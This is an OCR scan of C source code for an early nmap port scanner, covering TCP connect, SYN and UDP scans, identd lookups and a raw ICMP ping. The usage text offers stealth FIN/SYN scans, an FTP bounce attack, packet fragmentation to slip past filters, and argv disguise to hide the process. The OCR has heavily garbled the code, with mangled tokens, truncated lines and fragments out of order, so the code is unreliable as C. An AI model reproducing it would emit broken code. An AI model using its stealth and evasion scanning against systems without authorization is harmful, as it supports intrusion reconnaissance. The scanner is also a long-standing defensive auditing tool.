options = (~O_NONBLOCK) & fentl(sd, F_GETFL) ; 
fentl(sd, F_SETFL, options); 


return 1; 


} 


/* Currently only sets SO_LINGER, I haven’t seen any evidence that this 
helps. I’11 do more testing before dumping it. */ 

—_ inline void init_socket (int sd) {f{ 

struct linger 1; 


l_onoff = 1; 
1_linger = 0; 


if (setsockopt (sd, SOL_SOCKET, SO_LINGER, él, sizeof(struct linger) )) 


fprintf(stderr, "Problem setting socket SO_LINGER, errno: %d\n", errno); 
perror("setsockopt"); 
} 

} 


/* Convert a string like "-100,200-1024, 3000-4000, 60000-" into an array 
of port numbers*/ 

unsigned short *getpts(char *origexpr) { 

int exlen = strlen(origexpr) ; 

char *p,*q; 

unsigned short *tmp, *ports; 

int i=0, j3=0,start,end; 


char *expr = strdup(origexpr) ; 
ports = safe_malloc(65536 * sizeof(short)); 
ee. 
i} 
for(;j < exlen; j++) 
if (expr[j] != 7’ ’) expr[i++] = expr[jl]; 
expr[i] = '’\0’'; 
exlen = i+ 1; 
i=0; 
while((p = strchr(expr,’,’))) { 
*D = r\or 
if (*expr == ’-’) {start = 1; end = atoi(expr+ 1);} 
else { 
start = end = atoi(expr); 
if ((q = strchr(expr,’-’)) && *(q+1l) ) end = atoi(q + 1); 


else if (q && !*(qtl)) end = 65535; 
} 
if (debugging) 


printf("The first port is %*d, and the last one is %d\n", start, end); 
if (start < 1 || start > end) fatal("Your port specifications are illegal!"); 
for(j=start; j <= end; j++) 

ports [it+] a 


expr = p +. 1; 
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if (*expr == ’-’) { 
start = 1; 
end = atoi(expr+ 1); 


} 


else { 
start = end = atoi(expr); 
if ((q = strchr(expr,’-’)) && *(qtl) ) end = atoi(qtl); 


else if (q && !*(qtl)) end = 65535; 
} 
if (debugging) 


printf("The first port is %d, and the last one is %d\n", start, end); 
if (start < 1 || start > end) fatal("Your port specifications are illegal!"); 
for(j=start; j <= end; j++) 
ports [itt] ke 
number_of_ports = i; 
ports[it++] = 0; 
tmp = realloc(ports, i * sizeof(short)); 


free (expr); 
return tmp; 


} 


unsigned short *getfastports(int tcpscan, int udpscan) { 
int portindex = 0, res, lastport = 0; 
unsigned int portno = 0; 
unsigned short *ports; 
char proto[10]; 
char line[81]; 


FILE *fp; 

ports = safe_malloc(65535 * sizeof(unsigned short))j; 
proto[0] = ’\0’'; 

if ('(fp = fopen("/etc/services", "r"))) { 


printf("We can’t open /etc/services for reading! Fix your system or don’t use -f\n"); 
perror("fopen"); 
exit(1); 

} 


while(fgets(line, 80, fp)) { 


res = sscanf(line, "%S*s %u/%s", &portno, proto); 
if (res == 2 && portno != 0 && portno != lastport) { 
lastport = portno; 
if (tcpscan && proto[0] == ’t’) 
ports [portindex++] portno; 
else if (udpscan && proto[0] == ’u’) 
ports [portindex++] portno; 
} 
} 
number_of_ports = portindex; 
ports[portindex++] = 0; 


return realloc(ports, portindex * sizeof (unsigned short) ); 


} 


void printusage(char *name) { 
printf("%s [options] [hostname[/mask] .. .] 
options (none are required, most can be combined): 
-t tcp connect() port scan 
-s tcp SYN stealth port scan (must be root) 
-u UDP port scan, will use MUCH better version if you are root 
-U Uriel Maimon (P49-15) style FIN stealth scan. 


-l1 Do the lamer UDP scan even if root. Less accurate. 
-P ping \"scan\". Find which hosts on specified network(s) are up. 
-b <ftp_relay_host> ftp \"bounce attack\" port scan 


-f use tiny fragmented packets for SYN or FIN scan. 
-i Get identd (rfc 1413) info on listening TCP processes. 
-p <range> ports: ex: \’-p 23\’ will only try port 23 of the host(s) 
\’-p 20-30,63000-\’ scans 20-30 and 63000-65535 default: 1-1024 
-F fast scan. Only scans ports in /etc/services, a la strobe(1). 
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-r randomize target port scanning order. 
-h help, print this junk. Also see http://www.dhp.com/~ fyodor/nmap/ 
-S If you want to specify the source address of SYN or FYN scan. 
-v Verbose. Its use is recommended. Use twice for greater effect. 
-w <n> delay. n microsecond delay. Not recommended unless needed. 
—-M <n> maximum number of parallel sockets. Larger isn’t always better. 
-q quash argv to something benign, currently set to \"%s\". 
Hostnames specified as internet hostname or IP address. Optional ’/mask’ specifies subnet. 
cert.org/24 or 192.88.209.5/24 scan CERT’s Class C.\n", 
name, FAKE_ARGV) ; 
exit (1); 
} 


portlist tcp_scan(struct in_addr target, unsigned short *portarray, portlist *ports) { 


int starttime, current_out = 0, res , deadindex 0, i=0, j=0, k=0, max=0; 
struct sockaddr_in sock, stranger, mysock; 
int sockaddr_in_len = sizeof (struct sockaddr_in); 


int sockets[max_parallel_sockets], deadstack[max_parallel_sockets]; 
unsigned short portno[max_parallel_sockets]; 
char owner[513], buf[65536]; 


int tryident = identscan, current_socket /*actually it is a socket INDEX*/; 
fd_set fds_read, fds_write; 
struct timeval nowait = {0,0}, longwait = {7,0}; 


signal(SIGPIPE, SIG_IGN); /* ignore SIGPIPE so our ’write 0 bytes’ test 
doesn’t crash our program! */ 


owner[0] = ’\0’; 
starttime = time(NULL); 
bzero((char *)&sock, sizeof (struct sockaddr_in)); 
sock.sin_addr.s_addr = target.s_addr; 
if (verbose || debugging) 
printf ("Initiating TCP connect() scan against %s (%s)\n", 
current_name, inet_ntoa(sock.sin_addr)); 
sock.sin_family=AF_INET; 
FD_ZERO (&fds_read) ; 
FD_ZERO(&fds_write); 


if (tryident) 
tryident = check_ident_port (target) ; 


/* Initially, all of our sockets are "dead" */ 


for(i = 0; i < max_parallel_sockets; i++) { 
deadstack [deadindex+t] af 
portno[i] = 0; 


} 


deadindex--; 
/* deadindex always points to the most recently added dead socket index */ 


while (portarray[j]) { 
longwait.tv_sec = 7; 
longwait.tv_usec = nowait.tv_sec = nowait.tv_usec = 0; 
for (i=current_out; i < max_parallel_sockets && portarray[j]; i++, j++) { 
current_socket = deadstack [deadindex-—]; 
if ((sockets[current_socket] = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) 
{perror ("Socket troubles"); exit(1);} 
if (sockets[current_socket] > max) max = sockets[current_socket]; 


current_outtt; 

unblock_socket (sockets [current_socket]); 

init_socket (sockets [current_socket]); 

portno[current_socket] = portarray[j]; 

sock.sin_port = htons(portarray[j]); 

if ((res = connect (sockets [current_socket], (struct sockaddr *)&sock, sizeof (struct socka 
ddr)))!=-1) 

printf ("WTF???? I think we got a successful connection in non-blocking! !@#$\n"); 
else { 
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switch(errno) { 

case EINPROGRESS: /* The one I always see */ 

case EAGAIN: 
block_socket (sockets [current_socket]); 
FD_SET (sockets[current_socket], &fds_write); 
FD_SET (sockets[current_socket], &fds_read); 
break; 

default: 
printf("Strange error from connect: (%d)", errno); 
perror(""); /*falling through intentionally*/ 

case ECONNREFUSED: 


E 


Gl 


if (max == sockets[current_socket]) max--; 
deadstack [++deadindex] = current_socket; 
current_out--; 
portno[current_socket] = 0; 
close (sockets [current_socket]); 
break; 
} 
} 
} 
if (!portarray[j]) sleep(1); /*wait a second for any last packets*/ 


while((res = select (max + 1, &fds_read, &fds_write, NULL, 
(current_out < max_parallel_sockets) ? 
énowait : &longwait)) > 0) { 
for (k=0; k < max_parallel_sockets; k++) 
if (portno[k]) { 
if (FD_ISSET(sockets[k], &fds_write) 
&& FD_ISSET(sockets[k], &fds_read)) { 
/*printf ("Socket at port Shi is selectable for r & w.", portno[k]);*/ 
res = recvfrom(sockets[k], buf, 65536, 0, (struct sockaddr *) 
& stranger, &sockaddr_in_len) ; 
if (res >= 0) { 
if (debugging || verbose) 
printf ("Adding TCP port Shi due to successful read.\n", 
portno[k]); 
if (tryident) { 
if ( getsockname(sockets[k], (struct sockaddr *) &mysock, 


&sockaddr_in_len ) ) { 
perror("getsockname") ; 
exit (1); 
} 
tryident = getidentinfoz(target, ntohs(mysock.sin_port), 


portno[k], owner); 

} 

addport (ports, portno[k], IPPROTO_TCP, owner); 
} 
if (max == sockets[k]) 

max-——; 
FD_CLR(sockets[k], &fds_read) ; 
FD_CLR(sockets[k], &fds_write); 


deadstack [++deadindex] = k; 
current_out--; 
portno[k] = 0; 


close(sockets[k]); 
} 
else if (FD_ISSET(sockets[k], &fds_write)) {f 
/*printf ("Socket at port Shi is selectable for w only.VERIFYING\n", 
portno[k]);*/ 
res = send(sockets[k], buf, 0, 0); 
if (res < 0) { 
signal (SIGPIPE, SIG_IGN); 
if (debugging > 1) 
printf("Bad port Shi caught by O-byte write!\n", portno[k]); 


} 
else { 
if (debugging || verbose) 
printf ("Adding TCP port Shi due to successful O-byte write!\n", 
portno[k]); 
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if (tryident) { 
if ( getsockname(sockets[k], (struct sockaddr *) &é&mysock , 


&sockaddr_in_len ) ) { 
perror ("getsockname") ; 
exit (1); 
} 
tryident = getidentinfoz(target, ntohs(mysock.sin_port), 


portno[k], owner); 
} 
addport (ports, portno[k], IPPROTO_TCP, owner); 
} 


if (max == sockets[k]) max--; 
FD_CLR(sockets[k], &fds_write); 
deadstack [++deadindex] = k; 
current_out--; 

portno[k] = 0; 


close(sockets[k]); 
} 
else if ( FD_ISSET(sockets[k], &fds_read) ) f{ 


printf ("Socket at port Shi is selectable for r only. This is very wierd.\n", 


tno[k]); 
if (max == sockets[k]) max--; 
FD_CLR(sockets[k], &fds_read) ; 
deadstack [++deadindex] = k; 
current_out--; 
portno[k] = 0; 
close (sockets[k]); 


} 

else { 
/*printf ("Socket at port Shi not selecting, readding.\n",portno[k]);*/ 
FD_SET(sockets[k], &fds_write); 
FD_SET(sockets[k], &fds_read) ; 


} 


if (debugging || verbose) 
printf ("Scanned %d ports in %ld seconds with %d parallel sockets.\n", 
number_of_ports, time(NULL) - starttime, max_parallel_sockets); 
return *ports; 


} 


/* gawd, my next project will be in ct+ so I don’t have to deal with 
this crap ... simple linked list implementation */ 
int addport (portlist *ports, unsigned short portno, unsigned short protocol, 
char *owner) { 
struct port *current, *tmp; 
int len; 


if (*ports) { 
current = *ports; 
/* case 1: we add to the front of the list */ 
if (portno <= current->portno) { 


if (current-—>portno == portno && current-—>proto == protocol) { 
if (debugging || verbose) 
printf("Duplicate port (%hi/%s)\n", portno , 
(protocol == IPPROTO_TCP)? "tcp": "udp"); 


return -1; 
} 
tmp = current; 
*ports = safe_malloc(sizeof (struct port)); 
(*ports)—->next = tmp; 
current = *ports; 
current-—>portno = portno; 
current-—>proto = protocol; 
if (owner && *owner) { 
len = strlen(owner); 


por 
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} 


current-—>owner = malloc(sizeof(char) * (len + 1)); 
strncpy (current-—>owner, owner, len + 1); 
} 


lse current->owner = NULL; 


} 
else { /* case 2: we add somewhere in the middle or end of the list */ 
while( current->next && current-—>next-—>portno < portno) 


current = current-—>next; 
if (current-—>next && current-—>next-—>portno == portno 
&& current—>next-—>proto == protocol) { 
if (debugging || verbose) 
printf ("Duplicate port (%hi/%s)\n", portno , 
(protocol == IPPROTO_TCP)? "tcp": "udp"); 


return -1; 


} 


tmp = current-—>next; 

current—>next = safe_malloc(sizeof (struct port)); 
current—>next—>next = tmp; 

tmp = current-—>next; 


tmp->portno = portno; 

tmp->proto = protocol; 

if (owner && *owner) { 
len = strlen(owner); 
tmp->owner = malloc(sizeof(char) * (len + 1)); 
strncpy (tmp->owner, owner, len + 1); 


} 
lse tmp->owner = NULL; 


else { /* Case 3, list is null */ 


} 


*ports = safe_malloc(sizeof (struct port)); 
tmp = *ports; 
tmp->portno = portno; 
tmp->proto = protocol; 
if (owner && *owner) { 
len = strlen(owner); 
tmp->owner = safe_malloc(sizeof(char) * (len + 1)); 
strncpy(tmp->owner, owner, len + 1); 
} 
lse tmp->owner = NULL; 
tmp->next = NULL; 


return 0; /*success */ 


} 


int deleteport (portlist *ports, unsigned short portno, 


else { 
current = *ports; 
for(;current->next && (current->next->portno != portno || current->next->proto 
col); current = current-—>next) ; 
if (!current->next) 


unsigned short protocol) { 
portlist current, tmp; 


if (!*ports) { 
if (debugging > 1) error("Tried to delete from empty port list!"); 
return -1; 

} 


/* Case 1, deletion from front of list*/ 


if ((*ports)->portno == portno && (*ports)->proto == protocol) { 
tmp = (*ports)-—>next; 
if ((*ports)->owner) free((*ports)-—>owner) ; 


free (*ports); 
*ports = tmp; 
} 


return -1; 
tmp = current-—>next; 


!'= proto 
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current—>next = tmp->next; 
if (tmp->owner) fr (tmp->owner) ; 
free (tmp); 


return 0; /* success */ 


void *safe_malloc(int size) 


{ 


} 


void *mymem; 
if (size < 0) 


fatal("Tried to malloc negative amount of memmory!!!"); 
if ((mymem = malloc(size)) == NULL) 
fatal("Malloc Failed! Probably out of space."); 


return mymem; 


void printandfreeports(portlist ports) { 


} 


char protocol[4]; 
struct servent *service; 
port *current = ports, *tmp; 


printf("Port Number Protocol Service"); 


printf("Ss", (identscan) ?" Owner\n":"\n"); 
while(current != NULL) { 
strcpy (protocol, (current-—>proto == IPPROTO_TCP)? "tcp": "udp"); 
service = getservbyport (htons (current-—>portno), protocol); 
printf ("%-13d%-11s%-16s%s\n", current->portno, protocol, 
(service)? service->s_name: "unknown", 
(current-—>owner) ? current—>owner La) oe 
tmp = current; 
current = current-—>next; 
if (tmp->owner) fr (tmp->owner) ; 


free (tmp); 


} 
printf ("\n"); 


/* This is the version of udp_scan that uses raw ICMP sockets and requires 


root priviliges.*/ 


portlist udp_scan(struct in_addr target, unsigned short *portarray, 


portlist *ports) { 
int icmpsock, udpsock, tmp, done=0, retries, bytes = 0, res, num_out = 0; 
int i=0, 3=0, k=0, icmperrlimittime, max_tries = UDP_MAX_PORT_RETRIES; 
unsigned short outports[max_parallel_sockets], numtries[max_parallel_sockets]; 
struct sockaddr_in her; 


char senddata[] = "blah\n"; 
unsigned long starttime, sleeptime; 
struct timeval shortwait = {1, 0 }; 


fd_set fds_read, fds_write; 


bzero(outports, max_parallel_sockets * sizeof(unsigned short)); 
bzero(numtries, max_parallel_sockets * sizeof(unsigned short)); 


/* Some systems (like linux) follow the advice of rfcl812 and limit 
* the rate at which they will respons with icmp error messages 
* (like port unreachable). icmperrlimittime is to compensate for that. 
*f 

icmperrlimittime = 60000; 


sleeptime = (global_delay)? global_delay : (global_rtt)? (1.2 * global_rtt) + 30000 


ts 
if (global_delay) icmperrlimittime = global_delay; 


starttime = time(NULL); 


FD_ZERO (&fds_read) ; 


le5 
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FD_ZERO(&fds_write); 


if (verbose || debugging) 
printf ("Initiating UDP (raw ICMP version) scan against %s (%S) using wait delay of %li us 
ecs.\n", current_name, inet_ntoa(target), sleeptime) ; 


if ((icmpsock = socket (AF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) 
perror ("Opening ICMP RAW socket"); 

if ((udpsock = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) 
perror("Opening datagram socket"); 


unblock_socket (icmpsock) ; 
her.sin_addr = target; 
her.sin_family = AF_INET; 


while(!done) { 
tmp = num_out; 
for(i=0; (i < max_parallel_sockets && portarray[j]) || 1 < tmp; i++) { 
close (udpsock) ; 
if ((udpsock = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) 
perror("Opening datagram socket"); 


if ((i1 > tmp && portarray[j]) || numtries[i] > 1) { 
if (i > tmp) her.sin_port = htons(portarray[jt++]); 
else her.sin_port = htons(outports[i]); 


FD_SET(udpsock, &fds_write); 
FD_SET(icmpsock, &fds_read); 
shortwait.tv_sec = 1; shortwait.tv_usec = 0; 
usleep (icmperrlimittime) ; 
res = select (udpsock + 1, NULL, &fds_write, NULL, &shortwait); 
if (FD_ISSET(udpsock, &fds_write) ) 
bytes = sendto(udpsock, senddata, sizeof(senddata), 0, 
(struct sockaddr *) &her, sizeof(struct sockaddr_in)); 


else { 
printf ("udpsock not set for writing port %d!", ntohs(her.sin_port)); 
return *ports; 

} 

if (bytes <= 0) { 


if (errno == ECONNREFUSED) { 
retries = 10; 
do { 
/* This is from when I was using the same socket and would 


* (rather often) get strange connection refused errors, it 
* shouldn’t happen now that I create a new udp socket for each 
* port. At some point I will probably go back to 1 socket again. 
mf 
printf ("sendto said connection refused on port %d but trying again anyway.\n", 
ntohs (her.sin_port) ); 
usleep (icmperrlimittime) ; 
bytes = sendto(udpsock, senddata, sizeof(senddata), 0, 
(struct sockaddr *) &her, sizeof(struct sockaddr_in)); 
printf("This time it returned %d\n", bytes); 
} while(bytes <= 0 && retries-- > 0); 
} 
if (bytes <= 0) { 
printf("sendto returned %d.", bytes); 
fflush(stdout); 
perror("sendto"); 
} 
} 
if (bytes > 0 && i > tmp) { 
num_out+t; 
outports[i] = portarray[j-1]; 


} 
} 
usleep (sleeptime) ; 
tmp = listen_icmp(icmpsock, outports, numtries, &num_out, target, ports); 
if (debugging) printf("listen_icmp caught %d bad ports.\n", tmp); 
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done = !portarray[jl]; 
for (i=0,k=0; i < max_parallel_sockets; i++) 
if (outports[i]) { 
if (++numtries[i] > max_tries - 1) { 
if (debugging || verbose) 


printf ("Adding port %d for 0 unreachable port generations\n", 


outports[i]); 


addport (ports, outports[i 


num_out--; 


], IPPROTO_UDP, NULL); 


outports[i] = numtries[i] = 0; 
} 
else { 
done = 0; 
outports[k] = outports[i]; 
numtries[k] = numtries[i]; 
if (k != i) 
outports[i] = numtries[i] = 0; 
k++; 
} 
} 
if (num_out == max_parallel_sockets) { 


printf ("Numout is max sockets, 


that is a problem!\n"); 


sleep(1); /* Give some time for responses to trickle back, 
and possibly to reset the hosts ICMP error limit */ 


} 


if (debugging || verbose) 


printf("The UDP raw ICMP scanned %$d ports in %ld seconds with %d parallel sockets.\n", 


umber_of_ports, time(NULL) - starttime, max_parallel_sockets) ; 


close (icmpsock) ; 
close (udpsock) ; 
return *ports; 


} 


int listen_icmp (int icmpsock, 


unsigned short numtries[], int *num_out, 


portlist *ports) 
char response[1024]; 
struct sockaddr_in stranger; 


int sockaddr_in_size = sizeof(s 


struct in_addr bs; 


{ 


truct sockaddr_in); 


struct iphdr *ip = (struct iphdr *) response; 


struct icmphdr *icmp = (struct 
struct iphdr *ip2; 
unsigned short *data; 


unsigned short outports[], 
struct in_addr target, 


icmphdr *) (response + 


int badport, numcaught=0, bytes, i, tmptry=0, found=0; 


while 


((bytes = recvfrom(icmpsock, response, 1024, 0, 
(struct sockaddr *) 


&sockaddr_in_size)) > 0) f 


numcaught++; 
bs.s_addr = ip->saddr; 
if (ip->saddr == target.s_addr 


&& icomp->type == 3 && icmp- 


sizeof (struct iphdr)); 


&stranger, 


&& ip->protocol == IPPROTO_ICMP 


>code == 3) { 


ip2 = (struct iphdr *) (response + 4 * ip->ihl + sizeof(struct icmphdr)); 
data = (unsigned short *) ((char *)ip2 + 4 * ip2->ihl); 


badport = ntohs(data[1]); 


/*delete it from our outports array */ 


found = 0; 


for(i=0; i < max_parallel_sockets; itt) 


if (outports[i] == badport) 
found = 1; 
tmptry = numtries[il]; 
outports[i] = numtries[i] 
(*num_out) --; 
break; 


{ 


= 0; 


n 


11.txt Wed Apr 26 09:43:42 2017 21 


} 
if (debugging && found && tmptry > 0) 
printf ("Badport: %*d on try number %d\n", badport, tmptry); 
if (!found) { 
if (debugging) 
printf ("Badport %*d came in late, deleting from portlist.\n", badport); 
if (deleteport (ports, badport, IPPROTO_UDP) < 0) 
if (debugging) printf("Port deletion failed.\n"); 
} 
} 
else { 
printf ("Funked up packet!\n"); 
} 
} 


return numcaught; 


} 


/* This fucntion is nonsens. I wrote it all, really optimized etc. Then 
found out that many hosts limit the rate at which they send icmp errors : ( 
I will probably totally rewrite it to be much simpler at some point. For 
now I won’t worry about it since it isn’t a very important functions (UDP 
is lame, plus there is already a much better function for people who 
are r00t */ 

portlist lamer_udp_scan(struct in_addr target, unsigned short *portarray, 

portlist *ports) { 

nt sockaddr_in_size = sizeof(struct sockaddr_in),i=0,  j=0,k=0, bytes; 

nt sockets[max_parallel_sockets], trynum[max_parallel_sockets]; 

nsigned short portno[max_parallel_sockets]; 

nt last_open = 0; 

har response[1024]; 

truct sockaddr_in her, stranger; 

har data[] = "\nhelp\nquit\n"; 

nsigned long sleeptime; 

nsigned int starttime; 


secQauaqgreegree 


/* Initialize our target sockaddr_in */ 
bzero((char *) &her, sizeof(struct sockaddr_jin)); 
her.sin_family = AF_INET; 

her.sin_addr = target; 


if (global_delay) sleeptime = global_delay; 
lse sleeptime = calculate_sleep(target) + 60000; /*large to be on the 
safe side */ 


if (verbose || debugging) 
printf ("Initiating UDP scan against %s (%s), sleeptime: %1li\n", current_name, 
inet_ntoa(target), sleeptime) ; 


starttime = time(NULL); 


for(i = 0; i < max_parallel_sockets; i++) 
trynum[i] = portno[i] = 0; 
while (portarray[j]) { 
for(i=0; i < max_parallel_sockets && portarray[j]; i++, jtt) { 
if (i >= last_open) { 
if ((sockets[i] = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) 


{perror ("datagram socket troubles"); exit(1l);} 
block_socket (sockets[i]); 


portno[i] = portarray[j]; 
} 
her.sin_port = htons(portarray[j]); 
bytes = sendto(sockets[i], data, sizeof(data), 0, (struct sockaddr *) é&her, 


sizeof (struct sockaddr_in)); 
usleep (5000) ; 
if (debugging > 1) 
printf("Sent %d bytes on socket %d to port Shi, try number %d.\n", 
bytes, sockets[i], portno[i], trynum[i]); 
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if (bytes < 0) { 
printf ("Sendto returned %d the FIRST TIME! @#S!, errno %d\n", bytes, 
errno); 
perror(""); 
trynum[i] = portno[i] = 0; 
close(sockets[i]); 


} 


} 


last_open = i; 
/* Might need to change this to le6 if you are having problems*/ 
usleep(sleeptime + 5e5); 
for(i=0; i < last_open ; i++) { 
if (portno[i]) { 
unblock_socket (sockets[i]); 
if ((bytes = recvfrom(sockets[i], response, 1024, 0, 
(struct sockaddr *) &stranger, 
&sockaddr_in_size)) == -1) 


if (debugging > 1) 
printf("2nd recvfrom on port %d returned %d with errno %d.\n", 
portno[i], bytes, errno); 
if (errno == EAGAIN /*11*/) 
{ 


if (trynum[i] < 2) trynum[i]++; 
else { 
if (RISKY_UDP_SCAN) { 
printf ("Adding port %d after 3 EAGAIN errors.\n", portno[i]); 
addport (ports, portno[i], IPPROTO_UDP, NULL); 


} 
else if (debugging) 
printf ("Skipping possible false positive, port %d\n", 
portno[i]); 
trynum[i] = portno[i] = 0; 
close(sockets[i]); 


} 
lse if (errno == ECONNREFUSED /*111*/) { 
if (debugging > 1) 
printf ("Closing socket for port %d, ECONNREFUSED received.\n", 
portno[i]); 
trynum[i] = portno[i] = 0; 
close(sockets[i]); 


} 


else { 
printf("Curious recvfrom error (%d) on port Shi: ", 
errno, portno[i]); 
perror(""); 
trynum[i] = portno[i] = 0; 


close(sockets[i]); 

} 

} 
else /*bytes is positive*/ { 

if (debugging || verbose) 

printf ("Adding UDP port %d due to positive read!\n", portno[i]); 
addport (ports, portno[i], IPPROTO_UDP, NULL); 
trynum[i] = portno[i] = 0; 
close(sockets[i]); 


} 
} 


/* Update last_open, we need to create new sockets.*/ 


for(i=0, k=0; i < last_open; itt) 
if (portno[i]) { 
close(sockets[i]); 
sockets[k] = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP); 
/* unblock_socket (sockets [k]);*/ 
portno[k] = portno[i]; 


trynum[k] = trynum[i]; 


Wed Apr 26 09:43:42 2017 


last_open = k; 
for(i=k; i < max_parallel_sockets; itt) 
trynum[i] sockets [i] portno[i] 


0; 


} 


if (debugging) 


printf("UDP scanned %d ports in %Sld seconds with %d paral] 
— starttime, 


number_of_ports, time (NULL) 
return *ports; 


} 


/* This attempts to calculate the round trip time 


23 


sockets\n", 
l_sockets); 


max_parall 


(rtt) to a host by timing a 


connect () to a port which isn’t listening. A better approach is to time a 
ping (since it is more likely to get through firewalls. This is now 
implemented in isup() for users who are root. */ 


unsigned long calculate_s] 


leep (struct in_addr target) { 


struct timeval begin, end; 
int sd; 
struct sockaddr_in sock; 
int res; 
if ((sd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) 
{perror ("Socket troubles"); exit(1);} 
sock.sin_family = AF_INET; 
sock.sin_addr.s_addr = target.s_addr; 
sock.sin_port = htons (MAGIC_PORT) ; 
gettimeofday (&begin, NULL); 
if ((res = connect(sd, (struct sockaddr *) &sock, 
sizeof (struct sockaddr_in))) != -1) 
printf("You might want to change MAGIC_PORT in the include file, it seems to be listening 
on the target host!\n"); 
close(sd); 
gettimeofday(&end, NULL); 


if (end.tv_sec - begin.tv_sec > 5 ) /*uh-oh!*/ 
return 0; 

return (end.tv_sec - begin.tv_sec) * 1000000 + 

} 

/* Checks whether the identd port (113) 


sense wasting time trying it for each good port if it is down! 


int check_ident_port (struct in_addr target) { 
int sd; 
struct sockaddr_in sock; 


int res; 

if ((sd = socket (AF_INET, SOCK_STREAM, IPPROTO_ 
{perror ("Socket troubles"); exit(1);} 

sock.sin_family = AF_INET; 


sock.sin_addr.s_addr target.s_addr; 
sock.sin_port htons (113); 


res = connect(sd, (struct sockaddr *) &sock, 
close(sd); 
if (res < 0) { 
if (debugging || verbose) 
return 0; 
} 
if (debugging || verbose) 


return 1; 


} 


int getidentinfoz(struct in_addr target, 
char *owner) { 

int sd; 

struct sockaddr_in sock; 


is open on the target machine. 


/*should use getservbyname (3), 


int localport, 


(end.tv_usec —- begin.tv_usec); 


No 
*/ 


TCP) ) 


yeah, yeah */ 


sizeof (struct sockaddr_in)); 


printf ("identd port not active\n"); 


printf ("identd port is active\n"); 


int remoteport, 
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int res; 

char request[15]; 
char response[1024]; 
chan *p,*q? 

char *os; 


owner[0] = ’\0’; 
if ((sd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) 
{perror ("Socket troubles"); exit(1);} 


sock.sin_family = AF_INET; 

sock.sin_addr.s_addr = target.s_addr; 

sock.sin_port = htons(113); 

usleep (50000) ; /* If we aren’t careful, we really MIGHT take out inetd, 
some are very fragile */ 


res = connect(sd, (struct sockaddr *) &sock, sizeof(struct sockaddr_in)); 
if (res < 0) { 
if (debugging || verbose) 
printf ("identd port not active now for some reason ... hope we didn’t break it!\n"); 


close(sd); 
return 0; 
} 
sprintf (request, "shi, thi\r\n", remoteport, localport); 
if (debugging > 1) printf("Connected to identd, sending request: %s", request) ; 
if (write(sd, request, strlen(request) + 1) 1 
perror("identd write"); 
close(sd); 
return 0; 
} 
else if ((res = read(sd, response, 1024)) == -1) { 
perror("reading from identd"); 
close(sd); 
return 0; 
} 
else { 
close(sd); 
if (debugging > 1) printf("Read %d bytes from identd: %s\n", res, response); 


if ((p = strchr(response, ':’))) { 
ptt; 
if ((q = strtok(p, " :"))) { 
if ('strcasecmp( gq, "error")) { 
if (debugging || verbose) printf("ERROR returned from identd\n"); 


return 0; 
} 
if ((os = strtok (NULL, " :") 
if ((p = strtok(NULL, " :' 
if ((q = strcehr(p, ‘\r’ 
if ((q = strchr(p, ’\n’ 
strncpy(owner, p, 512); 
owner[512] = '\0’; 


PN OES 
ie fama Oar 


* 
1Q 
ll 


} 
} 
return 1; 


} 


/* A relatively fast (or at least short ;) ping function. Doesn’t require a 
seperate checksum function */ 

int isup(struct in_addr target) { 

int res, retries = 3; 

struct sockaddr_in sock; 

/*type (8bit)=8, code(8)=0 (echo REQUEST), checksum(16)=34190, id(16)=31337 */ 
ifdef _ LITTLE_ENDIAN_BITFIELD 

unsigned char ping[64] = { 0x8, Ox0, Ox8e, 0x85, 0x69, Ox7A }; 
else 
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unsigned char ping[64] = { 0x8, 0x0, 0x85, Ox8e, 
#endif 
int sd; 
struct timeval tv; 
struct timeval start, end; 


fd_set fd_read; 

struct { 
struct iphdr ip; 
unsigned char type; 
unsigned char code; 
unsigned short checksum; 
unsigned short identifier; 
char crap[16536]; 

} response; 


sd = socket (AF_INET, SOCK_RAW, IPPROTO_ICMP) ; 

bzero((char *)&sock, sizeof (struct sockaddr_in)); 

sock.sin_family=AF_INET; 

sock.sin_addr = target; 

if (debugging > 1) 

gettimeofday (&start, 

while(-—-retries) { 
if ((res = sendto(sd, (char *) 

sizeof (struct sockaddr) )) 


"sendto in isup returned $d! 


NULL) ; 


fprintf(stderr, 
return 0; 


} 
FD_ZERO (&fd_read) ; 


FD_SET(sd, &fd_read) ; 
tv.tv_sec = 0; 
tv.tv_usec = le6 * (PING_TIMEOUT / 3.0); 
while(l1) { 
if ((res = select(sd + 1, &fd_read, NULL, NULL, 
break; 
else { 


); 


read(sd, &response, sizeof (respons 
if (response.ip.saddr 


target.s_addr && 
-identifier == 31337) { 


Ox7A, Ox69 }; 


printf(" Sending 3 64 byte raw pings to host.\n"); 


ping, 64,0, (struct sockaddr *) &sock, 


64) { 
skipping host.\n", 


&tv)) != 1) 


!'response.type 


&& !response.code && respons 
gettimeofday(&end, NULL); 
global_rtt = (end.tv_sec - start.tv_sec) 
ouraddr.s_addr = response.ip.daddr; 
close(sd); 
return 1; 


} 
} 
close(sd); 
return 0; 


} 


portlist syn_scan(struct in_addr target, 
struct in_addr *source, 

int i=0, j=0, received, bytes, starttime; 

struct sockaddr_in from; 

int fromsize = sizeof (struct sockaddr_in); 

int sockets [max_parallel_sockets]; 

struct timeval tv; 

char packet [65535]; 

struct iphdr *ip = (struct iphdr *) 

struct tcphdr *tcp = (struct tcphdr *) 

fd_set fd_read, fd_write; 

int res; 

struct hostent *myhostent; 

char myname [MAXHOSTNAMELEN + 1]; 

int source_malloc = 0; 


packet; 


* le6 + end.tv_usec - 


unsigned short *portarray, 
int fragment, 


(packet + sizeof(struct iphdr)); 


res); 


start.tv_usec; 


portlist *ports) { 
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FD_ZERO (&fd_read) ; 
FD_ZERO(&fd_write) ; 


tv.tv_sec = 7; 
tv.tv_usec = 0; 


if ((received = socket (AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0 ) 
perror("socket trobles in syn_scan"); 

unblock_socket (received) ; 

FD_SET (received, &fd_read); 


/* First we take what is given to us as source. If that isn’t valid, we take 
what should have swiped from the echo reply in our ping function. If THAT 
doesn’t work either, we try to determine our address with gethostname and 
gethostbyname. Whew! */ 

if (!source) { 

if (ouraddr.s_addr) { 

